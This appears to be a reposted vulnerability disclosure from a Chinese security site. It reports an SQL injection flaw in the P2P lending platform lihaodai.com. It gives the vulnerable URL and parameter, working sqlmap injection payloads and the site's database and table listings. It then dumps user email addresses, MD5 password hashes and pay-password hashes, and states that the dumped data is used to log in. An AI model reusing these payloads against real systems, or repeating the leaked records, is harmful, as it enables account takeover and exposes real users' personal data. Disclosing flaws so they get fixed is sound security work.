频道栏目
首页 > 安全 > 网站安全 > 正文
P2P利好贷存在SQL注入漏洞用户信息可登录
2015-12-27 09:24:32           
收藏   我要投稿

P2P利好贷存在SQL注入漏洞涉及用户信息可登录

利好贷公司是一家网络P2P投融资平台公司,位于福建厦门。利好贷是由资深投资人与多家深度合作担保公司总结多年的投资经验应用大数据和科学的风控技术,共同倾力打造的网络P2P投融资平台。(百度百科)1、注入点:https://www.lihaodai.com/dyweb/dythemes/diyou/css/xsd/xsshow.php?xsRealName=admin(参数xsRealName存在注入)
Parameter: xsRealName (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: xsRealName=-8059' OR 1355=1355#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: xsRealName=-1233' OR 1 GROUP BY CONCAT(0x716b716a71,(SELECT (CASE W
HEN (1749=1749) THEN 1 ELSE 0 END)),0x7170627a71,FLOOR(RAND(0)*2)) HAVING MIN(0)
#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: xsRealName=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))UtYI)#
---
[01:19:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
2、所有数据库
available databases [6]:
[*] information_schema
[*] lihaodai
[*] mysql
[*] performance_schema
[*] testtwolihaodai
[*] xuesheng
3、数据库lihaodai中的188个表:
Database: lihaodai
[188 tables]
+---------------------------------+
| deayou_account                  |
| deayou_approve_realname         |
| deayou_users                    |
| deayou_users_info               |
| diyou_account                   |
| diyou_account_balance           |
| diyou_account_bank              |
| diyou_account_cash              |
| diyou_account_fee               |
| diyou_account_fee_type          |
| diyou_account_log               |
| diyou_account_payment           |
| diyou_account_recharge          |
| diyou_account_users             |
| diyou_account_users_bank        |
| diyou_account_web               |
| diyou_admin                     |
| diyou_admin_log                 |
| diyou_admin_login               |
| diyou_admin_type                |
| diyou_app_info                  |
| diyou_approve                   |
| diyou_approve_edu               |
| diyou_approve_edu_id5           |
| diyou_approve_id5               |
| diyou_approve_realname          |
| diyou_approve_sms               |
| diyou_approve_smslog            |
| diyou_approve_video             |
| diyou_areas                     |
| diyou_articles                  |

| diyou_articles_pages            |
| diyou_articles_type             |
| diyou_attestations              |
| diyou_attestations_type         |
| diyou_attestations_user         |
| diyou_borrow                    |
| diyou_borrow_activity           |
| diyou_borrow_amount             |
| diyou_borrow_amount_apply       |
| diyou_borrow_amount_log         |
| diyou_borrow_amount_type        |
| diyou_borrow_apply              |
| diyou_borrow_auto               |
| diyou_borrow_autolog            |
| diyou_borrow_care               |
| diyou_borrow_change             |
| diyou_borrow_change_rate        |
| diyou_borrow_count              |
| diyou_borrow_count_log          |
| diyou_borrow_credit             |
| diyou_borrow_fee                |
| diyou_borrow_fee_loan           |
| diyou_borrow_fee_log            |
| diyou_borrow_fee_type           |
| diyou_borrow_flag               |
| diyou_borrow_frost              |
| diyou_borrow_newtype            |
| diyou_borrow_preview            |
| diyou_borrow_recover            |
| diyou_borrow_repay              |
| diyou_borrow_roam               |
| diyou_borrow_style              |
| diyou_borrow_tender             |
| diyou_borrow_tender_auto        |
| diyou_borrow_tender_autolog     |
| diyou_borrow_tender_web         |
| diyou_borrow_type               |
| diyou_borrow_verify             |
| diyou_borrow_vouch              |
| diyou_borrow_vouch_recover      |
| diyou_borrow_vouch_repay        |
| diyou_borrow_youxuan            |
| diyou_borrow_youxuan_tender     |
| diyou_comment                   |
| diyou_comments                  |
| diyou_credit                    |
| diyou_credit_class              |
| diyou_credit_log                |
| diyou_credit_rank               |
| diyou_credit_type               |
| diyou_daily_bao                 |
| diyou_daily_log                 |

 

| diyou_dw_activity_review        |
| diyou_email                     |
| diyou_email_log                 |
| diyou_email_port                |
| diyou_email_sendlog             |
| diyou_exchange_log              |
| diyou_experience_cash           |
| diyou_experience_log            |
| diyou_goods                     |
| diyou_goods_type                |
| diyou_group                     |
| diyou_group_articles            |
| diyou_group_comments            |
| diyou_group_log                 |
| diyou_group_member              |
| diyou_group_type                |
| diyou_linkages                  |
| diyou_linkages_class            |
| diyou_linkages_type             |
| diyou_links                     |
| diyou_links_type                |
| diyou_message                   |
| diyou_message_receive           |
| diyou_modules                   |
| diyou_newspreads_cash_log       |
| diyou_newspreads_commission_log |
| diyou_newspreads_commission_set |
| diyou_newspreads_log            |
| diyou_newspreads_set            |
| diyou_newspreads_subsidy_log    |
| diyou_newspreads_users          |
| diyou_phone                     |
| diyou_phone_log                 |
| diyou_phone_port                |
| diyou_phone_smslog              |
| diyou_rating_assets             |
| diyou_rating_company            |
| diyou_rating_contact            |
| diyou_rating_educations         |
| diyou_rating_finance            |
| diyou_rating_houses             |
| diyou_rating_info               |
| diyou_rating_job                |
| diyou_red_envelope_config       |
| diyou_red_envelope_log          |
| diyou_remind                    |
| diyou_remind_log                |
| diyou_remind_type               |
| diyou_remind_user               |

 

| diyou_risk_account_log          |
| diyou_scrollpic                 |
| diyou_scrollpic_type            |
| diyou_site                      |
| diyou_site_menu                 |
| diyou_sms_type                  |
| diyou_spread_add                |
| diyou_spread_log                |
| diyou_spreads_log               |
| diyou_spreads_set               |
| diyou_spreads_settle_log        |
| diyou_spreads_users             |
| diyou_sysauto_auto              |
| diyou_sysauto_log               |
| diyou_system                    |
| diyou_ucenter                   |
| diyou_ucenter_set               |
| diyou_update_system             |
| diyou_users                     |
| diyou_users_admin               |
| diyou_users_admin_login         |
| diyou_users_admin_type          |
| diyou_users_adminlog            |
| diyou_users_care                |
| diyou_users_care_user           |
| diyou_users_email               |
| diyou_users_email_log           |
| diyou_users_examines            |
| diyou_users_friends             |
| diyou_users_friends_invite      |
| diyou_users_friends_type        |
| diyou_users_info                |
| diyou_users_log                 |
| diyou_users_login               |
| diyou_users_qq                  |
| diyou_users_rebut               |
| diyou_users_reglog              |
| diyou_users_return_log          |
| diyou_users_set                 |
| diyou_users_sina                |
| diyou_users_type                |
| diyou_users_upfiles             |
| diyou_users_vip                 |
| diyou_users_vip_bak             |
| diyou_users_viplog              |
| diyou_users_viplog_bak          |
| diyou_users_visit               |
| diyou_wechat_attention          |

 

| diyou_wechat_focususers         |
| diyou_wechat_material           |
| diyou_wechat_menu               |
| diyou_wechat_recovery           |
| diyou_wechat_sendmsg            |
| diyou_wechat_sendmsg_log        |
| diyou_wechat_set                |
| diyou_wechat_users              |
+---------------------------------+
4、deayou_users表中的字段:
Database: lihaodai
Table: deayou_users
[14 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| block_status   | int(1)           |
| email          | char(32)         |
| last_ip        | char(15)         |
| last_time      | int(10)          |
| logintime      | int(11)          |
| password       | char(32)         |
| paypassword    | varchar(100)     |
| reg_ip         | char(15)         |
| reg_time       | int(10)          |
| tuijian_userid | int(11)          |
| up_ip          | char(15)         |
| up_time        | int(10)          |
| user_id        | int(11) unsigned |
| username       | char(15)         |
+----------------+------------------+
5、字段email,password,paypassword的数据(只看一部分):
| 100012191@qq.com  | 3b8403d686bbf542901925af2cabb01a            | NULL
                     |
| 1000**55@qq.com   | d0dcbf0d12a6b1e7fbfa2ce5848f3eff (**123456) | 62649863c025
d9577a1fa083ccfd371d |
| 1002294917@qq.com | ca0d88224e8e4ad38bbe0d361aa33f61            | c0d843406e43
169a23124018992a77f7 |
| 1002631747@qq.com | 3030737f23dea935c4a7e399e56cf30d            | NULL
                     |
| 1004548177@QQ.COM | 8bbda585acf997a32acb39564463ec43            | 5c47452c631d
c649f799dfc259fd6f85 |
| 1005323954@qq.com | 7f247a14c68f54fd0314a5c3fdb02774            | NULL
                     |
| 1005948568@qq.com | a125e96d56f565f75ba27804886eecb8            | NULL
                     |
| 1005960185@qq.com | 8b164f1c39a90644b8e09f5760370574            | NULL
                     |
| 1006085440@qq.com | b2661916664effefd6d81b4ace9f2167            | NULL
                     |
| 1006635251@qq.com | 2a83ee66c34d5e683324fd81acec8301            | 315571c9e6d1
8d1224276f49501a13fd |
| 1006705924@qq.com | 0f7668f4f2760a810fd6590df15ceeb6            | NULL

 

                     |
| 1007070@qq.com    | 0c9312e5144f08599bd13cc895dcde54            | NULL
                     |
| 1007806535@qq.com | db109d7f3e07b2b9e6009e3ed4b352d8            | NULL
                     |
| 1010354919@qq.com | 2ae19517e1a61dc7313a028252228746            | NULL
                     |
| 1010832057@qq.com | 77f451ef7a1180b89390d72a3e605871            | 64006d701279
0588829719f7c1894213 |
| 1012834191@qq.com | 1e566843372eabac85a2d353c13b4e18            | NULL
                     |
| 1012@qq.com       | 7146ae0cc5e79ffad343632a432ebf08            | f01ea624e75b
18b141a340f9f46d8542 |
| 1013190216@qq.com | 5a804ca36c543a14766ae1d3287ae675            | 0b85874fa48e
c5fee3beeec26e358aa9 |
| 1013352481@qq.com | 6380212fca05f9676afd6f23ee0f4c80            | f6aec20d1dce
52ad15c56a30326087af |
| 1014242060@qq.com | eb696f1b64c6a7ae0767d0a3176ecb53            | NULL
                     |
| 101**18764@qq.com | 0eafe0ae2aa251fd0c5990274faa606b (1**506)   | NULL
6、用dump下来的数据登录一下:

解决方案:
参数过滤。

点击复制链接 与好友分享!回本站首页
相关TAG标签 漏洞 用户 信息
上一篇:专访尹毅(法师Seay)少年成名:野路子的奇妙逆袭
下一篇:戴瑞珠宝设计缺陷可进入后台(订单金额修改/用户信息/明文密码)
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站